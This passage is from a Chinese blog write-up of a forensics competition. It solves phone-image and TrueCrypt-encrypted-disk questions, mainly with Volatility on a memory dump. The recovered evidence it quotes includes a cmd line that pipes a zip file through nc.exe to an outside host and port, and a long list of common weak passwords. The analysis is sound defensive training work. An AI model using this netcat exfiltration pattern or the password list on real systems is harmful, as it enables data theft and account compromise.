<p><strong>10.手机中被删除的通话记录条数和其中通话次数最少的未接电话号码。</strong></p>
<p>表面上看 进到了通话记录那一栏 没有显示被删除的通话记录 顺便滑倒底 发现了一个显示为空号的号码 我想了想 一般空号是打出去号码之后运营商告诉我们的 我们的手机应该是会记录你拨出去的每一条号码 觉得这个空号很可疑 摸到数据库文件 打开寻找calls键值</p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/6.png" class="">

<p>诶 我们发现了这个位置的值是空噢 很像是人为删除的 但是就这样就断定肯定不够 </p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/7.png" class="">

<p>我发现了这条通话记录竟然有38秒 一般来说空号10秒内就会挂了 这条记录很可疑噢 并且我认为通话状态也是修改过的 很可能是接通过了 毕竟所有的值都可以进行修改 所以修改了一条 这题还蛮有意思的</p>
<p><strong>11.该手机在某个时间后没有再收发过短、彩信，找出这个时间。</strong></p>
<p>这题也蛮有意思的 刚开始读不出来手机的短信记录 我本来以为是软件的问题 打算去看数据库文件的</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data分区<span class="symbol">\d</span>ata<span class="symbol">\c</span>om.android.providers.telephony<span class="symbol">\d</span>atabases<span class="symbol">\m</span>mssms.db</span><br></pre></td></tr></table></figure>

<p>结果发现整个数据库文件光有列名 数据什么的全是空的</p>
<p>灵光一现 去找找图片 看看有没有留下线索 果然去搜集了各图片之后能发现是7月26号星期三 但是不知道是哪一年 于是去翻翻日历 看看18年到16年哪年的7月26号是星期三 最终确定是2017年7月26日星期三上午10点之后 应该也只能分析到这里了</p>
<img src="/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/8.png" class="">

<p><strong>12.手机曾进行过数据恢复操作，请找出最后一次数据恢复完成的时间。</strong></p>
<p>凭感觉吧 是这样子 如果说是数据恢复了 那么恢复的所有文件应该是在同一时间创建才对 而我在上一题找短信的时候发现了 截图里的系统时间和图片本身的创建时间不一样 我开始怀疑这张图片的来源 很可能就是之前删除过的 后来被恢复出来的图片 好死不死我看了下每张图片的创建时间都是2017-12-28 23:39:35 板上钉钉是数据恢复的结果 所以数据恢复的完成时间就是他</p>
<h1 id="加密磁盘分析"><a href="#加密磁盘分析" class="headerlink" title="加密磁盘分析"></a><strong>加密磁盘分析</strong></h1><p><strong>P.S.这部分给了两个镜像 一个是经过Truecrypt加密的过的磁盘 还有一个是内存镜像</strong></p>
<p><strong>1.获取小Y使用的浏览器及对应的进程号PID。</strong></p>
<p>问到进程PID号 那就从内存出发 pslist一下 发现是IE浏览器</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">0x82257a50</span> IEXPLORE.EXE            <span class="number">164</span>   <span class="number">1608</span>     <span class="number">15</span>      <span class="number">435</span>      <span class="number">0</span>      <span class="number">0</span> <span class="number">2018</span>-<span class="number">10</span>-<span class="number">24</span> <span class="number">06</span>:<span class="number">19</span>:<span class="number">38</span> UTC+<span class="number">0000</span></span><br></pre></td></tr></table></figure>

<p>IE浏览器那就好了哇 内存里面是可以直接调取IE浏览器的历史纪录的 后续会方便很多 要区分EXPLORE.EXE和IEXPLORE.EXE</p>
<p>2.找到小Y访问过的存放密码的<strong>网址</strong>，得到其中的<strong>flag</strong>。</p>
<p>知道他是IE访问的那就简单了 内存中会记录下IE的浏览记录 记住只有IE的 其他的浏览器没有</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">./volatility.exe</span> -f 1.dd <span class="params">--profile=WinXPSP2x86</span> iehistory</span><br></pre></td></tr></table></figure>

<p>出来的记录比较多 其中这几个值得关注一下</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">Location:</span> <span class="symbol">Visited:</span> forensic<span class="variable">@http</span><span class="symbol">://www</span>.purpleroc.com/download.txt</span><br><span class="line"><span class="symbol">Location:</span> <span class="symbol">Visited:</span> forensic<span class="variable">@http</span><span class="symbol">://www</span>.purpleroc.com</span><br><span class="line"><span class="symbol">Location:</span> <span class="symbol">Visited:</span> forensic<span class="variable">@http</span><span class="symbol">://purpleroc</span>.com/markdown</span><br><span class="line"><span class="symbol">Location:</span> <span class="symbol">:</span><span class="number">2018102420181025</span>: forensic<span class="variable">@http</span><span class="symbol">://www</span>.purpleroc.com/download.txt</span><br><span class="line"><span class="symbol">Location:</span> <span class="symbol">:</span><span class="number">2018102420181025</span>: forensic@<span class="symbol">:Host</span>: www.purpleroc.com</span><br><span class="line"><span class="symbol">Location:</span> <span class="symbol">:</span><span class="number">2018102420181025</span>: forensic<span class="variable">@http</span><span class="symbol">://www</span>.purpleroc.com</span><br><span class="line"><span class="symbol">Location:</span> <span class="symbol">:</span><span class="number">2018102420181025</span>: forensic<span class="variable">@http</span><span class="symbol">://purpleroc</span>.com/markdown</span><br><span class="line"><span class="symbol">Location:</span> <span class="symbol">:</span><span class="number">2018102420181025</span>: forensic@<span class="symbol">:Host</span>: purpleroc.com</span><br></pre></td></tr></table></figure>

<p>特别是第一条 文件名为下载 反正试一下嘛 好死不死进去一看</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">ZmxhZ3tzaDB3X200X3kwdXJfcDB3NHJ9Cg==</span><br><span class="line">财务常用密码：</span><br><span class="line"><span class="number">111222</span>tianya</span><br><span class="line"><span class="number">1111111</span></span><br><span class="line"><span class="number">12345</span></span><br><span class="line"><span class="number">121212</span></span><br><span class="line">qwerty</span><br><span class="line"><span class="number">7758258</span></span><br><span class="line"><span class="number">999999</span></span><br><span class="line"><span class="number">12345678910</span></span><br><span class="line">woaini123</span><br><span class="line">q123456</span><br><span class="line"><span class="number">100200</span></span><br><span class="line">aaaaaa</span><br><span class="line"><span class="number">222222</span></span><br><span class="line">Basic</span><br><span class="line">woaini520</span><br><span class="line">abcd1234</span><br><span class="line">qq<span class="number">123456789</span></span><br><span class="line"><span class="number">110110</span></span><br><span class="line">always_say_520</span><br><span class="line">u_cant_find_me</span><br><span class="line">do_you_like_forensic</span><br><span class="line">r_u_kidding_me</span><br><span class="line"><span class="number">5201314</span></span><br><span class="line"><span class="number">123456</span></span><br><span class="line"><span class="number">123456789</span></span><br><span class="line"><span class="number">111111</span></span><br><span class="line"><span class="number">123123</span></span><br><span class="line">passport</span><br><span class="line"><span class="number">000000</span></span><br><span class="line"><span class="number">12345678</span></span><br><span class="line"><span class="number">5201314</span></span><br><span class="line">a123456</span><br><span class="line"><span class="number">123321</span></span><br><span class="line"><span class="number">1234567</span></span><br><span class="line"><span class="number">666666</span></span><br><span class="line">a<span class="number">123456789</span></span><br><span class="line"><span class="number">888888</span></span><br><span class="line">zxcvbnm</span><br><span class="line"><span class="number">123456</span>a</span><br><span class="line">a321654</span><br><span class="line"><span class="number">7758521</span></span><br><span class="line"><span class="number">1234567890</span></span><br><span class="line"><span class="number">1314520</span> </span><br><span class="line"><span class="number">123456</span>abc</span><br><span class="line">woaini1314</span><br><span class="line"><span class="number">11111111</span></span><br><span class="line"><span class="number">654321</span></span><br><span class="line">aha_i_got_u</span><br><span class="line"><span class="number">13343431231</span></span><br><span class="line"><span class="number">19910303</span></span><br></pre></td></tr></table></figure>

<p>这个密码按照题目的逻辑 应该是假的密码 只能打开一部分硬盘内容 而最上面的记录很明显是一串base64 我们解开就是flag</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">flag</span>&#123;sh<span class="number">0</span>w_m<span class="number">4</span>_y<span class="number">0</span>ur_p<span class="number">0</span>w<span class="number">4</span>r&#125;</span><br></pre></td></tr></table></figure>

<p>3.获取财务电脑上加密磁盘使用的<strong>加密软件名称</strong>。</p>
<p>我们当时在pslist的时候 就发现了有个 TrueCrypt.exe的应用进程</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">0x8212f020</span> TrueCrypt.exe          <span class="number">2188</span>   <span class="number">1608</span>      <span class="number">3</span>      <span class="number">197</span>      <span class="number">0</span>      <span class="number">0</span> <span class="number">2018</span>-<span class="number">10</span>-<span class="number">24</span> <span class="number">06</span>:<span class="number">21</span>:<span class="number">42</span> UTC+<span class="number">0000</span></span><br></pre></td></tr></table></figure>

<p>其实可以直接就这样断定他用的是TrueCrypt了 但是为了保险起见 我们去取证大师看一眼</p>
<p>取证大师直接导入.vhd镜像文件的时候 会显示说存在TrueCrypt加密分区 尝试使用TrueCrypt解密 这样基本上就板上钉钉了</p>
<p>4.找出小Y最后打开的假的《股票分配书——绝密.xls》文件的<strong>密码</strong>。</p>
<p>很明显密码就是上面那一串之中的一个 人工跑字典吧 反正也不多 最后得出来的密码是aha_i_got_u</p>
<p>5.小Y最后打开的假的《股票分配书——绝密.xls》文件里有个<strong>flag</strong>，找到它。</p>
<p>用那个密码给.vhd磁盘解密 出来之后发现了传说中的假的股票分配书 往下滑会发现存在一个flag</p>
<figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;<span class="built_in">A_fake</span>_file_store_in_fake_disk&#125;</span><br></pre></td></tr></table></figure>

<p>6.分析获取小Y使用的财务电脑的<strong>账号</strong>。</p>
<p>账号嘛 我们getsids一下 或者从注册表入手都可以</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">nc</span>.exe (<span class="number">2652</span>): S-<span class="number">1</span>-<span class="number">5</span>-<span class="number">21</span>-<span class="number">725345543</span>-<span class="number">838170752</span>-<span class="number">2146829589</span>-<span class="number">1004</span> (forensic)</span><br><span class="line"><span class="attribute">nc</span>.exe (<span class="number">2652</span>): S-<span class="number">1</span>-<span class="number">5</span>-<span class="number">21</span>-<span class="number">725345543</span>-<span class="number">838170752</span>-<span class="number">2146829589</span>-<span class="number">513</span> (Domain Users)</span><br></pre></td></tr></table></figure>

<p>只有这样长度的sid才有意义 所以说用户名是forensic</p>
<p>7.分析获取小Y使用的财务电脑的<strong>账号</strong>。</p>
<p>说真的这题我不会做 pass</p>
<p>8.小Y通过网络发送了某个文件，分析其发往何处，得到<strong>目的地址</strong>。</p>
<p>这题也蛮有意思 还是从pslist入手 我们在pslist的时候还会发现一个有意思的进程</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">0x821038b0</span> nc.exe                 <span class="number">2652</span>   <span class="number">2408</span>      <span class="number">1</span>       <span class="number">41</span>      <span class="number">0</span>      <span class="number">0</span> <span class="number">2018</span>-<span class="number">10</span>-<span class="number">24</span> <span class="number">06</span>:<span class="number">23</span>:<span class="number">05</span> UTC+<span class="number">0000</span></span><br></pre></td></tr></table></figure>

<p>这玩意可不简单 netcat 也叫瑞士军刀 用于传输文件 并且方式是使用cmd 于是我们可以搜集cmd历史记录</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">Cmd</span> #<span class="number">2</span> @ <span class="number">0</span>x<span class="number">55</span>b<span class="number">688</span>: type ?????????.zip | nc.exe forensic.aa.q.ints.xyz <span class="number">2333</span></span><br></pre></td></tr></table></figure>

<p>这里的一连串问号是因为中文编码的问题 forensic.aa.q.ints.xyz是域名 2333是端口</p>
<p>9.小Y发送的文件中有个<strong>flag</strong>，找到它。</p>
<p>很明显我们要找到这个zip文件 直接filescan | grep zip都好说 但是问题是我这直接这样做报错了</p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Traceback (most recent call last):</span><br><span class="line">  File <span class="string">&quot;vol.py&quot;</span>, line 192, in &lt;module&gt;</span><br><span class="line">  File <span class="string">&quot;vol.py&quot;</span>, line 183, in main</span><br><span class="line">  File <span class="string">&quot;volatility\commands.py&quot;</span>, line 147, in<span class="built_in"> execute</span></span><br><span class="line"><span class="built_in"></span>  File <span class="string">&quot;volatility\plugins\dumpfiles.py&quot;</span>, line 1185, in render_text</span><br><span class="line">IOError: [Errno 0] Error</span><br><span class="line">[13968] Failed to<span class="built_in"> execute </span>script vol</span><br></pre></td></tr></table></figure>

<p>怀疑是中文编码的问题 于是我打算去kali里面试一下 linux下命令可以支持中文的 然后我去我的kali虚拟机里面一把梭了一下</p>
<p>诶果真可以导出 就是编码的问题 只不过出来的是dat文件 我们file一下看看文件类型</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">file</span>.None.<span class="number">0</span>x<span class="number">81</span>f<span class="number">3</span>e<span class="number">578</span>.dat: Zip archive data, at least v<span class="number">2</span>.<span class="number">0</span> to extract</span><br></pre></td></tr></table></figure>

<p>诶是个压缩包 我们在电脑上操作  注意存在双层压缩 看不出来的面壁思过</p>
<figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml">flag</span><span class="template-variable">&#123;u_must_be_good_at_forensic&#125;</span></span><br></pre></td></tr></table></figure>

<p>并且我们也可以从中得到真正的股票分配Excel</p>
<p>10.小Y得到真正的绝密文件时，使用了解密密钥；请在内存镜像中查找用来解密的<strong>密钥信息</strong>。</p>
<p>取证大师的内存取证工具 往往被我们忽略 这个内存取证工具是可以对TrueCrypt进行尝试性寻找密钥的 就在工具箱里</p>
<p>我们找到密钥之后保存在桌面上 在取证大师里面找到TryeCrypt解密 导入密钥文件 注意选的是导入内存密钥文件</p>
<p>然后我们就可以看到真正的股票分配书了 完结撒花</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://dawoxiansigema.github.io">2hl0k3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://dawoxiansigema.github.io/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/">https://dawoxiansigema.github.io/2021/07/17/%E4%B8%AD%E7%A7%91%E7%AC%AC%E4%B8%80%E5%B1%8A/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://dawoxiansigema.github.io" target="_blank">2hl0k3r's Studio</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E4%B8%AD%E7%A7%91/">中科</a></div><div class="post_share"><div class="social-share" data-image="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/gh/overtrue/share.js@master/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2021/07/21/ISA%E5%9F%B9%E8%AE%AD/"><img class="prev-cover" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">CPPUISA培训</div></div></a></div><div class="next-post pull-right"><a href="/2021/04/26/math/"><img class="next-cover" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">CISCN 2019 初赛 Love Math</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://i.loli.net/2021/02/24/5O1day2nriDzjSu.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">2hl0k3r</div><div class="author-info__description">It's better to burn out than to fade away</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">49</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">20</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">15</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E5%AD%98%E9%95%9C%E5%83%8F%E5%88%86%E6%9E%90"><span class="toc-number">1.</span> <span class="toc-text">内存镜像分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Windows%E7%A3%81%E7%9B%98%E9%95%9C%E5%83%8F%E5%8F%96%E8%AF%81%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">Windows磁盘镜像取证分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%89%8B%E6%9C%BA%E9%95%9C%E5%83%8F%E5%8F%96%E8%AF%81"><span class="toc-number">3.</span> <span class="toc-text">手机镜像取证</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8A%A0%E5%AF%86%E7%A3%81%E7%9B%98%E5%88%86%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">加密磁盘分析</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2022/01/07/%E5%92%B8%E9%B1%BC%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%9D%E7%BB%AA/" title="咸鱼的一些思绪"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="咸鱼的一些思绪"/></a><div class="content"><a class="title" href="/2022/01/07/%E5%92%B8%E9%B1%BC%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%9D%E7%BB%AA/" title="咸鱼的一些思绪">咸鱼的一些思绪</a><time datetime="2022-01-07T03:03:59.000Z" title="发表于 2022-01-07 11:03:59">2022-01-07</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/10/31/21%E9%95%BF%E5%AE%89%E6%9D%AF/" title="21长安杯"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="21长安杯"/></a><div class="content"><a class="title" href="/2021/10/31/21%E9%95%BF%E5%AE%89%E6%9D%AF/" title="21长安杯">21长安杯</a><time datetime="2021-10-31T02:22:31.000Z" title="发表于 2021-10-31 10:22:31">2021-10-31</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/10/18/0928%E5%B9%BF%E4%B8%9C%E7%9C%81%E6%AF%94%E6%AD%A6/" title="0928广东省比武"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="0928广东省比武"/></a><div class="content"><a class="title" href="/2021/10/18/0928%E5%B9%BF%E4%B8%9C%E7%9C%81%E6%AF%94%E6%AD%A6/" title="0928广东省比武">0928广东省比武</a><time datetime="2021-10-18T12:25:48.000Z" title="发表于 2021-10-18 20:25:48">2021-10-18</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/10/06/19%E8%83%BD%E5%8A%9B/" title="cnas2019"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="cnas2019"/></a><div class="content"><a class="title" href="/2021/10/06/19%E8%83%BD%E5%8A%9B/" title="cnas2019">cnas2019</a><time datetime="2021-10-06T11:05:39.000Z" title="发表于 2021-10-06 19:05:39">2021-10-06</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2021/09/26/frida/" title="Frida"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Frida"/></a><div class="content"><a class="title" href="/2021/09/26/frida/" title="Frida">Frida</a><time datetime="2021-09-26T12:10:35.000Z" title="发表于 2021-09-26 20:10:35">2021-09-26</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022 By 2hl0k3r</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>